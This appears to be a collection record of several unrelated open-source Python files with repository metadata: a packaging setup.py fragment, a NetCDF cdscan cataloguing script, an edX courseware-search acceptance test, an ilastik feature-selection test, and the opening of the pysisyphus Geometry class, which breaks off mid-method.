# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
# This field adds keywords for your project which will appear on the
# project page. What does your project relate to?
#
# Note that this is a string of words separated by whitespace, not a list.
keywords='SMILES classification keras', # Optional
# You can just specify package directories manually here if your project is
# simple. Or you can use find_packages().
#
# Alternatively, if you just want to distribute a single Python file, use
# the `py_modules` argument instead as follows, which will expect a file
# called `my_module.py` to exist:
#
# py_modules=["my_module"],
#
packages=find_packages(exclude=['contrib', 'docs', 'tests']), # Required
# This field lists other packages that your project depends on to run.
# Any package you put here will be installed by pip when your project is
# installed, so they must be valid existing projects.
#
# For an analysis of "install_requires" vs pip's requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=['pandas','keras','scikit-learn','matplotlib','reportlab','seaborn','joblib','xgboost','mordred','configparser','argparse'], # Optional
# List additional groups of dependencies here (e.g. development
# dependencies). Users will be able to install these using the "extras"
# syntax, for example:
#
# $ pip install sampleproject[dev]
#
# Similar to `install_requires` above, these must be valid existing
# projects.
#extras_require={ # Optional
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
#},
# If there are data files included in your packages that need to be
# installed, specify them here.
#
# If using Python 2.6 or earlier, then these have to be included in
# MANIFEST.in as well.
#package_data={ # Optional
# 'sample': ['package_data.dat'],
#},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
#
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('moloi_data', ['data/'])], # Optional
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# `pip` to create the appropriate form of executable for the target
# platform.
#
# For example, the following would provide a command called `sample` which
# executes the function `main` from this package when invoked:
#entry_points={ # Optional
# 'console_scripts': [
# 'sample=sample:main',
# ],
#},
# List additional URLs that are relevant to your project as a dict.
#
# This field corresponds to the "Project-URL" metadata fields:
# https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use
#
# Examples listed include a pattern for specifying where the package tracks
# issues, where the source is hosted, where to say thanks to the package
# maintainers, and where to support the project financially. The key is
# what's used to render the link text on PyPI.
#project_urls={ # Optional
# 'Bug Reports': 'https://github.com/pypa/sampleproject/issues',
# 'Funding': 'https://donate.pypi.org',
# 'Say Thanks!': 'http://saythanks.io/to/example',
# 'Source': 'https://github.com/pypa/sampleproject/',
#},
)
|
DentonJC/virtual_screening
|
setup.py
|
Python
|
gpl-3.0
| 8,119
|
[
"VisIt"
] |
0d30a3130dfb4a4ca121c7e290d1c6cb730237ba08f1b95fbb929ff153ff8144
|
#!/usr/bin/env python
"""
Filename: version_safe_cdscan.py
Description: Create a xml catalogue of NetCDF files using cdscan
Input: List on XML files
Output: XML catalogue file suitable for use with CDAT/UV-CDAT (cdms python library)
Author: David Kent David.Kent@csiro.au
Revisions: Tim Bedin Tim.Bedin@csiro.au
Tim Erwin Tim.Erwin@csiro.au
Copyright: CSIRO, 2011
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys, re, os
from optparse import OptionParser
import subprocess
import numpy as np
#CDAT
import cdms2
__version__ = '$Id$'
def cdscan(inputs, output):
cmds = ['cdscan', '-x', output] + inputs
subprocess.Popen(cmds).wait()
def change_permissions(ifile):
cmds = ['chmod', '775', ifile]
subprocess.Popen(cmds).wait()
def overlaps(m, ms):
for testm in ms:
if int(m.group(1)) < int(testm.group(2)) and \
int(m.group(2)) > int(testm.group(1)):
return True
return False
def check_time_axis(ifile):
# Check the output to ensure that the time-axis is complete.
c = cdms2.open(ifile)
if 'time' in c.axes:
t = c.axes['time']
if len(t) <= 1:
c.close()
return 0
# Need to allow time-axis with units in "days since ..." to
# vary a little.
dt = t[1] - t[0]
if t.units.startswith("days"):
mindt = dt - 3
maxdt = dt + 3
else:
mindt = dt
maxdt = dt
diff_ts = [elem[1] - elem[0] for elem in \
zip(t[:-1], t[1:])]
#check = np.logical_and(mindt <= diff_ts,
# maxdt >= diff_ts)
#print mindt <= diff_ts
check = t[1:][np.logical_or(diff_ts < mindt,diff_ts > maxdt)]
if len(check) > 0:
# Not constantly increasing time-axis.
print('\nERROR:\tTime axis not consistently monotonically increasing.')
print('\tCheck that input files represent entire time period')
#Print Problem Files
import cdtime
print("\tBoundaries of problem time points")
for tp in check:
print('\t\t'),
tindex = np.where(t==tp)[0][0]
for invalid_t in t[tindex-1:tindex+1]:
print('%s,' % cdtime.reltime(invalid_t,t.units).tocomp()),
print('\n')
c.close()
return 1
c.close()
return 0
def main(inputs, output, ignore=False):
"""Run the program.
"""
vpat = re.compile(r'(v\d+)/')
inputs_with_version = filter(vpat.search, inputs)
if inputs_with_version:
inputs_version_stripped = map(lambda s: vpat.sub('', s), inputs)
inputs_versions = map(vpat.search, inputs)
latest_versions = []
handled = []
for i in range(len(inputs)):
if i in handled:
continue
current = inputs_version_stripped[i]
if inputs_version_stripped.count(current) > 1:
idxs = [j for j, f in enumerate(inputs_version_stripped) \
if f == current]
versions = [inputs_versions[j] for j in idxs]
greatest = versions.index(max(versions))
greatest_idxs = idxs[greatest]
latest_versions.append(inputs[greatest_idxs])
handled += idxs
else:
latest_versions.append(inputs[i])
handled.append(i)
inputs = latest_versions
# Some CMIP3 datasets have two files representing that same variable/
# time-period. We want to strip out duplicates....
#date_pat = re.compile(r'(\d{4,6})[\d-]*.*(\d{4,6})[\d-]*')
date_pat = re.compile(r'(\d{4,10})-(\d{4,10})')
inputs_with_dates = map(date_pat.search, inputs)
if any(inputs_with_dates) and not all(inputs_with_dates):
# limit only to those with dates
newinputs = []
for i, has_date in enumerate(inputs_with_dates):
if has_date:
newinputs.append(inputs[i])
inputs = newinputs
elif all(inputs_with_dates):
used_so_far = []
for i, has_date in enumerate(inputs_with_dates):
if not overlaps(has_date, [t[0] for t in used_so_far]):
used_so_far.append((has_date, inputs[i]))
else:
print 'Warning: file overlaps. Skipping. ' + inputs[i]
inputs = [t[1] for t in used_so_far]
for infile in inputs:
if check_time_axis(infile):
print("Error in time axis of file %s" % infile)
sys.exit(1)
cdscan(inputs, output)
if ignore:
return
# Check the output to ensure that the time-axis is complete.
if check_time_axis(output):
print("\tRemoving file %s" % output)
os.remove(output)
sys.exit(1)
# Change permissions for the cdscan.
change_permissions(output)
if __name__ == '__main__':
usage = "usage: %prog [options] input output \n" + \
" input:\tInput file name\n"+\
" output:\tOutput file name"
parser = OptionParser(usage=usage, version=__version__)
parser.add_option("-i", "--ignore-check",
action="store_true", dest="ignore", default=False,
help="Print the names of the files.")
#parser.add_option("-y", "--num-years",
# dest="numyears", default=None, type="int",
# help="Try and concatenate total number of years, YEARS, from the end of the catalogue. start_date and end_date ignored. ")
(options, args) = parser.parse_args()
if len(args) < 2:
parser.print_usage()
sys.exit(1)
main(args[:-1], args[-1], options.ignore)
|
paolap/cwsl-ctools
|
aggregation/version_safe_cdscan.py
|
Python
|
apache-2.0
| 6,261
|
[
"NetCDF"
] |
ee2f86def5502082882b5de2cfa42c0697dfc2e77ec952271695307b27a0fd22
|
"""
Test courseware search
"""
import json
from common.test.acceptance.fixtures.course import CourseFixture, XBlockFixtureDesc
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.common.logout import LogoutPage
from common.test.acceptance.pages.common.utils import click_css
from common.test.acceptance.pages.lms.course_home import CourseHomePage
from common.test.acceptance.pages.lms.courseware_search import CoursewareSearchPage
from common.test.acceptance.pages.studio.container import ContainerPage
from common.test.acceptance.pages.studio.overview import CourseOutlinePage as StudioCourseOutlinePage
from common.test.acceptance.pages.studio.utils import add_html_component, type_in_codemirror
from common.test.acceptance.tests.helpers import UniqueCourseTest, remove_file
class CoursewareSearchTest(UniqueCourseTest):
"""
Test courseware search.
"""
USERNAME = 'STUDENT_TESTER'
EMAIL = 'student101@example.com'
STAFF_USERNAME = "STAFF_TESTER"
STAFF_EMAIL = "staff101@example.com"
HTML_CONTENT = """
Someday I'll wish upon a star
And wake up where the clouds are far
Behind me.
Where troubles melt like lemon drops
Away above the chimney tops
That's where you'll find me.
"""
SEARCH_STRING = "chimney"
EDITED_CHAPTER_NAME = "Section 2 - edited"
EDITED_SEARCH_STRING = "edited"
TEST_INDEX_FILENAME = "test_root/index_file.dat"
shard = 5
def setUp(self):
"""
Create search page and course content to search
"""
# create test file in which index for this test will live
with open(self.TEST_INDEX_FILENAME, "w+") as index_file:
json.dump({}, index_file)
self.addCleanup(remove_file, self.TEST_INDEX_FILENAME)
super(CoursewareSearchTest, self).setUp()
self.course_home_page = CourseHomePage(self.browser, self.course_id)
self.studio_course_outline = StudioCourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Section 1').add_children(
XBlockFixtureDesc('sequential', 'Subsection 1')
)
).add_children(
XBlockFixtureDesc('chapter', 'Section 2').add_children(
XBlockFixtureDesc('sequential', 'Subsection 2')
)
).install()
def _auto_auth(self, username, email, staff):
"""
Logout and login with given credentials.
"""
LogoutPage(self.browser).visit()
AutoAuthPage(self.browser, username=username, email=email,
course_id=self.course_id, staff=staff).visit()
def _studio_publish_content(self, section_index):
"""
Publish content on studio course page under specified section
"""
self._auto_auth(self.STAFF_USERNAME, self.STAFF_EMAIL, True)
self.studio_course_outline.visit()
subsection = self.studio_course_outline.section_at(section_index).subsection_at(0)
subsection.expand_subsection()
unit = subsection.unit_at(0)
unit.publish()
def _studio_edit_chapter_name(self, section_index):
"""
Edit chapter name on studio course page under specified section
"""
self._auto_auth(self.STAFF_USERNAME, self.STAFF_EMAIL, True)
self.studio_course_outline.visit()
section = self.studio_course_outline.section_at(section_index)
section.change_name(self.EDITED_CHAPTER_NAME)
def _studio_add_content(self, section_index):
"""
Add content on studio course page under specified section
"""
self._auto_auth(self.STAFF_USERNAME, self.STAFF_EMAIL, True)
# create a unit in course outline
self.studio_course_outline.visit()
subsection = self.studio_course_outline.section_at(section_index).subsection_at(0)
subsection.expand_subsection()
subsection.add_unit()
# got to unit and create an HTML component and save (not publish)
unit_page = ContainerPage(self.browser, None)
unit_page.wait_for_page()
add_html_component(unit_page, 0)
unit_page.wait_for_element_presence('.edit-button', 'Edit button is visible')
click_css(unit_page, '.edit-button', 0, require_notification=False)
unit_page.wait_for_element_visibility('.modal-editor', 'Modal editor is visible')
type_in_codemirror(unit_page, 0, self.HTML_CONTENT)
click_css(unit_page, '.action-save', 0)
def _studio_reindex(self):
"""
Reindex course content on studio course page
"""
self._auto_auth(self.STAFF_USERNAME, self.STAFF_EMAIL, True)
self.studio_course_outline.visit()
self.studio_course_outline.start_reindex()
self.studio_course_outline.wait_for_ajax()
def _search_for_content(self, search_term):
"""
Login and search for specific content
Arguments:
search_term - term to be searched for
Returns:
(bool) True if search term is found in resulting content; False if not found
"""
self._auto_auth(self.USERNAME, self.EMAIL, False)
self.course_home_page.visit()
course_search_results_page = self.course_home_page.search_for_term(search_term)
if len(course_search_results_page.search_results.html) > 0:
search_string = course_search_results_page.search_results.html[0]
else:
search_string = ""
return search_term in search_string
# TODO: TNL-6546: Remove usages of sidebar search
def _search_for_content_in_sidebar(self, search_term, perform_auto_auth=True):
"""
Login and search for specific content in the legacy sidebar search
Arguments:
search_term - term to be searched for
perform_auto_auth - if False, skip auto_auth call.
Returns:
(bool) True if search term is found in resulting content; False if not found
"""
if perform_auto_auth:
self._auto_auth(self.USERNAME, self.EMAIL, False)
self.courseware_search_page = CoursewareSearchPage(self.browser, self.course_id)
self.courseware_search_page.visit()
self.courseware_search_page.search_for_term(search_term)
return search_term in self.courseware_search_page.search_results.html[0]
def test_search(self):
"""
Make sure that you can search for something.
"""
# Create content in studio without publishing.
self._studio_add_content(0)
# Do a search, there should be no results shown.
self.assertFalse(self._search_for_content(self.SEARCH_STRING))
# Do a search in the legacy sidebar, there should be no results shown.
self.assertFalse(self._search_for_content_in_sidebar(self.SEARCH_STRING, False))
# Publish in studio to trigger indexing.
self._studio_publish_content(0)
# Do the search again, this time we expect results.
self.assertTrue(self._search_for_content(self.SEARCH_STRING))
# Do the search again in the legacy sidebar, this time we expect results.
self.assertTrue(self._search_for_content_in_sidebar(self.SEARCH_STRING, False))
|
ahmedaljazzar/edx-platform
|
common/test/acceptance/tests/lms/test_lms_courseware_search.py
|
Python
|
agpl-3.0
| 7,715
|
[
"VisIt"
] |
2c6ec259cc52a547740fc36deac9a24a1445d157fdffad624501c38f12f1a4e1
|
###############################################################################
# ilastik: interactive learning and segmentation toolkit
#
# Copyright (C) 2011-2014, the ilastik developers
# <team@ilastik.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# In addition, as a special exception, the copyright holders of
# ilastik give you permission to combine ilastik with applets,
# workflows and plugins which are not covered under the GNU
# General Public License.
#
# See the LICENSE file for details. License information is also available
# on the ilastik web site at:
# http://ilastik.org/license.html
###############################################################################
import os
import numpy
from lazyflow.roi import sliceToRoi
from lazyflow.graph import Graph, OperatorWrapper
from lazyflow.operators.ioOperators import OpInputDataReader
from ilastik.applets.featureSelection.opFeatureSelection import OpFeatureSelection
import vigra
import ilastik.ilastik_logging
ilastik.ilastik_logging.default_config.init()
import tempfile
class TestOpFeatureSelection(object):
def setUp(self):
data = numpy.random.random((2,100,100,100,3))
self.filePath = tempfile.mkdtemp() + '/featureSelectionTestData.npy'
numpy.save(self.filePath, data)
graph = Graph()
# Define operators
opFeatures = OperatorWrapper( OpFeatureSelection, operator_kwargs={'filter_implementation':'Original'}, graph=graph )
opReader = OpInputDataReader(graph=graph)
# Set input data
opReader.FilePath.setValue( self.filePath )
# Connect input
opFeatures.InputImage.resize(1)
opFeatures.InputImage[0].connect( opReader.Output )
# Configure scales
scales = [0.3, 0.7, 1, 1.6, 3.5, 5.0, 10.0]
opFeatures.Scales.setValue(scales)
# Configure feature types
featureIds = [ 'GaussianSmoothing',
'LaplacianOfGaussian',
'StructureTensorEigenvalues',
'HessianOfGaussianEigenvalues',
'GaussianGradientMagnitude',
'DifferenceOfGaussians' ]
opFeatures.FeatureIds.setValue(featureIds)
# Configure matrix
# sigma: 0.3 0.7 1.0 1.6 3.5 5.0 10.0
selections = numpy.array( [[True, False, False, False, False, False, False], # Gaussian
[False, True, False, False, False, False, False], # L of G
[False, False, True, False, False, False, False], # ST EVs
[False, False, False, False, False, False, False], # H of G EVs
[False, False, False, False, False, False, False], # GGM
[False, False, False, False, False, False, False]] ) # Diff of G
opFeatures.SelectionMatrix.setValue(selections)
self.opFeatures = opFeatures
self.opReader = opReader
def tearDown(self):
self.opFeatures.cleanUp()
self.opReader.cleanUp()
try:
os.remove(self.filePath)
except:
pass
def test_basicFunctionality(self):
opFeatures = self.opFeatures
# Compute results for the top slice only
topSlice = [0, slice(None), slice(None), 0, slice(None)]
result = opFeatures.OutputImage[0][topSlice].wait()
numFeatures = numpy.sum(opFeatures.SelectionMatrix.value)
outputChannels = result.shape[-1]
# Input has 3 channels, and one of our features outputs a 3D vector
assert outputChannels == 15 # (3 + 3 + 9)
# Debug only -- Inspect the resulting images
if False:
# Export the first slice of each channel of the results as a separate image for display purposes.
import vigra
numFeatures = result.shape[-1]
for featureIndex in range(0, numFeatures):
featureSlice = list(topSlice)
featureSlice[-1] = featureIndex
vigra.impex.writeImage(result[featureSlice], "test_feature" + str(featureIndex) + ".bmp")
def test_2d(self):
graph = Graph()
data2d = numpy.random.random((2,100,100,1,3))
data2d = vigra.taggedView(data2d, axistags='txyzc')
# Define operators
opFeatures = OpFeatureSelection('Original', graph=graph)
opFeatures.Scales.connect(self.opFeatures.Scales[0])
opFeatures.FeatureIds.connect(self.opFeatures.FeatureIds[0])
opFeatures.SelectionMatrix.connect(self.opFeatures.SelectionMatrix[0])
# Set input data
opFeatures.InputImage.setValue(data2d)
# Compute results for the top slice only
topSlice = [0, slice(None), slice(None), 0, slice(None)]
result = opFeatures.OutputImage[topSlice].wait()
def testDirtyPropagation(self):
opFeatures = self.opFeatures
dirtyRois = []
def handleDirty( slot, roi ):
dirtyRois.append( roi )
opFeatures.OutputImage[0].notifyDirty( handleDirty )
# Change the matrix
selections = numpy.array( [[True, False, False, False, False, False, False], # Gaussian
[False, True, False, False, False, False, False], # L of G
[False, False, True, False, False, False, False], # ST EVs
[False, False, False, True, False, False, False], # H of G EVs
[False, False, False, False, False, False, False], # GGM
[False, False, False, False, False, False, False]] ) # Diff of G
opFeatures.SelectionMatrix.setValue(selections)
assert len(dirtyRois) == 1
assert (dirtyRois[0].start, dirtyRois[0].stop) == sliceToRoi( slice(None), self.opFeatures.OutputImage[0].meta.shape )
if __name__ == "__main__":
import sys
import nose
sys.argv.append("--nocapture") # Don't steal stdout. Show it on the console as usual.
sys.argv.append("--nologcapture") # Don't set the logging level to DEBUG. Leave it alone.
nose.run(defaultTest=__file__)
|
nielsbuwen/ilastik
|
tests/test_applets/featureSelection/testOpFeatureSelection.py
|
Python
|
gpl-3.0
| 6,640
|
[
"Gaussian"
] |
96ed3df462eb27e82571864b76fe38e9eaeaf2d07d49cb11e2a0fae7d17acce6
|
from collections import Counter, namedtuple
import copy
import itertools as it
import re
import subprocess
import tempfile
import sys
import h5py
import numpy as np
from scipy.spatial.distance import pdist
from scipy.spatial.transform import Rotation
import rmsd
try:
from thermoanalysis.QCData import QCData
from thermoanalysis.thermo import thermochemistry
except ModuleNotFoundError:
pass
from pysisyphus import logger
from pysisyphus.config import p_DEFAULT, T_DEFAULT
from pysisyphus.constants import BOHR2ANG
from pysisyphus.elem_data import (
MASS_DICT,
ISOTOPE_DICT,
ATOMIC_NUMBERS,
COVALENT_RADII as CR,
)
from pysisyphus.helpers_pure import eigval_to_wavenumber, full_expand
from pysisyphus.intcoords import DLC, RedundantCoords, TRIC
from pysisyphus.intcoords.exceptions import (
NeedNewInternalsException,
RebuiltInternalsException,
DifferentCoordLengthsException,
)
from pysisyphus.intcoords.helpers import get_tangent
from pysisyphus.intcoords.setup import BOND_FACTOR
from pysisyphus.intcoords.setup_fast import find_bonds
from pysisyphus.xyzloader import make_xyz_str
def inertia_tensor(coords3d, masses):
"""Inertita tensor.
| x² xy xz |
(x y z)^T . (x y z) = | xy y² yz |
| xz yz z² |
"""
x, y, z = coords3d.T
squares = np.sum(coords3d ** 2 * masses[:, None], axis=0)
I_xx = squares[1] + squares[2]
I_yy = squares[0] + squares[2]
I_zz = squares[0] + squares[1]
I_xy = -np.sum(masses * x * y)
I_xz = -np.sum(masses * x * z)
I_yz = -np.sum(masses * y * z)
I = np.array(((I_xx, I_xy, I_xz), (I_xy, I_yy, I_yz), (I_xz, I_yz, I_zz)))
return I
def get_trans_rot_vectors(cart_coords, masses, rot_thresh=1e-6):
"""Vectors describing translation and rotation.
These vectors are used for the Eckart projection by constructing
a projector from them.
See Martin J. Field - A Pratcial Introduction to the simulation
of Molecular Systems, 2007, Cambridge University Press, Eq. (8.23),
(8.24) and (8.26) for the actual projection.
See also https://chemistry.stackexchange.com/a/74923.
Parameters
----------
cart_coords : np.array, 1d, shape (3 * atoms.size, )
Atomic masses in amu.
masses : iterable, 1d, shape (atoms.size, )
Atomic masses in amu.
Returns
-------
ortho_vecs : np.array(6, 3*atoms.size)
2d array containing row vectors describing translations
and rotations.
"""
coords3d = np.reshape(cart_coords, (-1, 3))
total_mass = masses.sum()
com = 1 / total_mass * np.sum(coords3d * masses[:, None], axis=0)
coords3d_centered = coords3d - com[None, :]
I = inertia_tensor(coords3d, masses)
_, Iv = np.linalg.eigh(I)
Iv = Iv.T
masses_rep = np.repeat(masses, 3)
sqrt_masses = np.sqrt(masses_rep)
num = len(masses)
def get_trans_vecs():
"""Mass-weighted unit vectors of the three cartesian axes."""
for vec in ((1, 0, 0), (0, 1, 0), (0, 0, 1)):
_ = sqrt_masses * np.tile(vec, num)
yield _ / np.linalg.norm(_)
def get_rot_vecs():
"""As done in geomeTRIC."""
rot_vecs = np.zeros((3, cart_coords.size))
# p_vecs = Iv.dot(coords3d_centered.T).T
for i in range(masses.size):
p_vec = Iv.dot(coords3d_centered[i])
for ix in range(3):
rot_vecs[0, 3 * i + ix] = Iv[2, ix] * p_vec[1] - Iv[1, ix] * p_vec[2]
rot_vecs[1, 3 * i + ix] = Iv[2, ix] * p_vec[0] - Iv[0, ix] * p_vec[2]
rot_vecs[2, 3 * i + ix] = Iv[0, ix] * p_vec[1] - Iv[1, ix] * p_vec[0]
rot_vecs *= sqrt_masses[None, :]
return rot_vecs
trans_vecs = list(get_trans_vecs())
rot_vecs = np.array(get_rot_vecs())
# Drop vectors with vanishing norms
rot_vecs = rot_vecs[np.linalg.norm(rot_vecs, axis=1) > rot_thresh]
tr_vecs = np.concatenate((trans_vecs, rot_vecs), axis=0)
tr_vecs = np.linalg.qr(tr_vecs.T)[0].T
return tr_vecs
def get_trans_rot_projector(cart_coords, masses, full=False):
tr_vecs = get_trans_rot_vectors(cart_coords, masses=masses)
U, s, _ = np.linalg.svd(tr_vecs.T)
if full:
P = np.eye(cart_coords.size)
for tr_vec in tr_vecs:
P -= np.outer(tr_vec, tr_vec)
else:
P = U[:, s.size :].T
return P
class Geometry:
coord_types = {
"cart": None,
"redund": RedundantCoords,
"dlc": DLC,
"tric": TRIC,
}
def __init__(
self,
atoms,
coords,
fragments=None,
coord_type="cart",
coord_kwargs=None,
isotopes=None,
freeze_atoms=None,
comment="",
name="",
):
"""Object representing atoms in a coordinate system.
The Geometry represents atoms and their positions in coordinate
system. By default cartesian coordinates are used, but internal
coordinates are also possible.
Parameters
----------
atoms : iterable
Iterable of length N, containing element symbols.
coords : 1d iterable
1d iterable of length 3N, containing the cartesian coordinates
of N atoms.
fragments : dict, optional
Dict with different keys denoting different fragments. The values
contain lists of atom indices.
coord_type : {"cart", "redund"}, optional
Type of coordinate system to use. Right now cartesian (cart)
and redundand (redund) are supported.
coord_kwargs : dict, optional
Dictionary containing additional arguments that get passed
to the constructor of the internal coordinate class.
isotopes : iterable of pairs, optional
Iterable of pairs consisting of 0-based atom index and either an integer
or a float. If an integer is given the closest isotope mass will be selected.
Given a float, this float will be directly used as mass.
freeze_atoms : iterable of integers
Specifies which atoms should remain fixed at their initial positions.
comment : str, optional
Comment string.
name : str, optional
Verbose name of the geometry, e.g. methanal or water. Used for printing
"""
self.atoms = atoms
# self._coords always holds cartesian coordinates.
self._coords = np.array(coords, dtype=float).flatten()
assert self._coords.size == (3 * len(self.atoms)), (
f"Expected 3N={3*len(self.atoms)} cartesian coordinates but got "
f"{self._coords.size}. Did you accidentally supply internal "
"coordinates?"
)
if fragments is None:
fragments = dict()
self.fragments = fragments
if isotopes is None:
isotopes = list()
self.isotopes = isotopes
if freeze_atoms is None:
freeze_atoms = list()
elif type(freeze_atoms) is str:
freeze_atoms = full_expand(freeze_atoms)
self.freeze_atoms = np.array(freeze_atoms, dtype=int)
assert all(self.freeze_atoms >= 0) and (
(self.freeze_atoms.size == 0) or (self.freeze_atoms.max() < len(self.atoms))
)
if (coord_type == "cart") and not (coord_kwargs is None or coord_kwargs == {}):
print(
"coord_type is set to 'cart' but coord_kwargs were given. "
"This is probably not intended. Exiting!"
)
sys.exit()
self.coord_type = coord_type
coord_kwargs = coord_kwargs if coord_kwargs is not None else {}
coord_class = self.coord_types[self.coord_type]
if coord_class:
assert (
coords.size != 3
), "Only 'coord_type': 'cart' makes sense for coordinates of length 3!"
if (self.freeze_atoms is not None) and ("freeze_atoms" not in coord_kwargs):
coord_kwargs["freeze_atoms"] = freeze_atoms
self.internal = coord_class(
atoms,
self.coords3d.copy(),
**coord_kwargs,
)
else:
self.internal = None
self.comment = comment
self.name = name
self._masses = None
self._energy = None
self._forces = None
self._hessian = None
self.calculator = None
@property
def sum_formula(self):
return "_".join(
[f"{atom.title()}{num}" for atom, num in Counter(self.atoms).items()]
)
def assert_compatibility(self, other):
"""Assert that two Geometries can be substracted from each other.
Parameters
----------
other : Geometry
Geometry for comparison.
"""
same_atoms = self.atoms == other.atoms
same_coord_type = self.coord_type == other.coord_type
same_coord_length = len(self.coords) == len(other.coords)
assert same_atoms, "Atom number/ordering is incompatible!"
assert same_coord_type, "coord_types are incompatible!"
try:
assert same_coord_length, "Different length of coordinate vectors!"
except AssertionError:
raise DifferentCoordLengthsException
def __eq__(self, other):
return (self.atoms == other.atoms) and all(self.coords == other.coords)
def __sub__(self, other):
self.assert_compatibility(other)
if self.coord_type == "cart":
diff = self.coords - other.coords
elif self.coord_type in ("redund", "dlc"):
# Take periodicity of dihedrals into account by calling
# get_tangent(). Care has to be taken regarding the orientation
# of the returned tangent vector. It points from self to other.
#
# As we want to return the difference between two vectors we
# have to reverse the direction of the tangent by multiplying it
# with -1 to be consistent with basic subtraction laws ...
# A - B = C, where C is a vector pointing from B to A (B + C = A)
# In our case get_tangent returns B - A, that is a vector pointing
# from A to B.
diff = -get_tangent(
self.internal.prim_coords,
other.internal.prim_coords,
self.internal.dihedral_indices,
)
else:
raise Exception("Invalid coord_type!")
# Convert to DLC
if self.coord_type == "dlc":
diff = self.internal.U.T.dot(diff)
return diff
def __add__(self, other):
atoms = tuple(self.atoms) + tuple(other.atoms)
coords = np.concatenate((self.cart_coords, other.cart_coords))
return Geometry(atoms, coords)
def atom_xyz_iter(self):
return iter(zip(self.atoms, self.coords3d))
def copy(self, coord_type=None, coord_kwargs=None):
"""Returns a new Geometry object with same atoms and coordinates.
Parameters
----------
coord_type : str
Desired coord_type, defaults to current coord_type.
coord_kwargs : dict, optional
Any desired coord_kwargs that will be passed to the RedundantCoords
object.
Returns
-------
geom : Geometry
New Geometry object with the same atoms and coordinates.
"""
if coord_type is None:
coord_type = self.coord_type
if coord_kwargs is None:
coord_kwargs = dict()
# Geometry constructor will exit when coord_kwargs are given
# with coord_type == 'cart'. So we only supply it when we are
# NOT using cartesian coordinates.
_coord_kwargs = None
if coord_type != "cart":
try:
typed_prims = self.internal.typed_prims
# Will be raised if the current coord_type is 'cart'
except AttributeError:
typed_prims = None
_coord_kwargs = {
"typed_prims": typed_prims,
"check_bends": True,
}
_coord_kwargs.update(coord_kwargs)
return Geometry(
self.atoms,
self._coords.copy(),
coord_type=coord_type,
coord_kwargs=_coord_kwargs,
isotopes=copy.deepcopy(self.isotopes),
freeze_atoms=self.freeze_atoms.copy(),
)
def copy_all(self, coord_type=None, coord_kwargs=None):
new_geom = self.copy(coord_type, coord_kwargs)
new_geom.set_calculator(self.calculator)
new_geom.energy = self._energy
if self._forces is not None:
new_geom.cart_forces = self._forces
if self._hessian is not None:
new_geom.cart_hessian = self._hessian
return new_geom
def atom_indices(self):
"""Dict with atom types as key and corresponding indices as values.
Returns
-------
inds_dict : dict
Unique atom types as keys, corresponding indices as values.
"""
inds_dict = {}
for atom_type in set(self.atoms):
inds_dict[atom_type] = [
i for i, atom in enumerate(self.atoms) if atom == atom_type
]
return inds_dict
@property
def atom_types(self):
return set(self.atoms)
@property
def atomic_numbers(self):
return [ATOMIC_NUMBERS[a.lower()] for a in self.atoms]
def get_fragments(self, regex):
regex = re.compile(regex)
frags = [frag for frag in self.fragments.keys() if regex.search(frag)]
org_indices = list(it.chain(*[self.fragments[frag] for frag in frags]))
new_atoms = [self.atoms[ind] for ind in org_indices]
new_coords = self.coords3d[org_indices].copy()
new_fragments = dict()
i = 0
for frag in frags:
frag_atoms = len(self.fragments[frag])
new_fragments[frag] = list(range(i, i + frag_atoms))
i += frag_atoms
return Geometry(new_atoms, new_coords, fragments=new_fragments)
@property
def layers(self):
try:
layers = self.calculator.layers
except AttributeError:
layers = (None,)
return layers
def del_atoms(self, inds, **kwargs):
atoms = [atom for i, atom in enumerate(self.atoms) if not (i in inds)]
c3d = self.coords3d
coords3d = np.array(
[c3d[i] for i, _ in enumerate(self.atoms) if not (i in inds)]
)
return Geometry(atoms, coords3d.flatten(), **kwargs)
def set_calculator(self, calculator, clear=True):
"""Reset the object and set a calculator."""
if clear:
self.clear()
self.calculator = calculator
@property
def is_analytical_2d(self):
try:
return self.calculator.analytical_2d
except AttributeError:
return False
@property
def mm_inv(self):
"""Inverted mass matrix.
Returns a diagonal matrix containing the inverted atomic
masses.
"""
return np.diag(1 / self.masses_rep)
@property
def mm_sqrt_inv(self):
"""Inverted square root of the mass matrix."""
return np.diag(1 / (self.masses_rep ** 0.5))
@property
def coords(self):
"""1d vector of atomic coordinates.
Returns
-------
coords : np.array
1d array holding the current coordinates.
"""
if self.internal:
coords = self.internal.coords
else:
# self._coords will always hold Cartesian coordinates.
coords = self._coords
return coords
def set_coord(self, ind, coord):
"""Set a coordinate by index.
Parameters
----------
ind : int
Index in of the coordinate to set in the self.coords array.
coord : float
Coordinate value.
"""
assert (
self.coord_type == "cart" and len(self.freeze_atoms) == 0
), "set_coord was not yet tested with coord_type != 'cart' and frozen atoms!"
self.coords[ind] = coord
self.clear()
def set_coords(self, coords, cartesian=False, update_constraints=False):
coords = np.array(coords).flatten()
# Do Internal->Cartesian backtransformation if internal coordinates are used.
if self.internal:
# When internal coordinates are employed it may happen, that the underlying
# Cartesian coordinates are updated, e.g. from the IPIServer calculator, which
# may yield different internal coordinates.
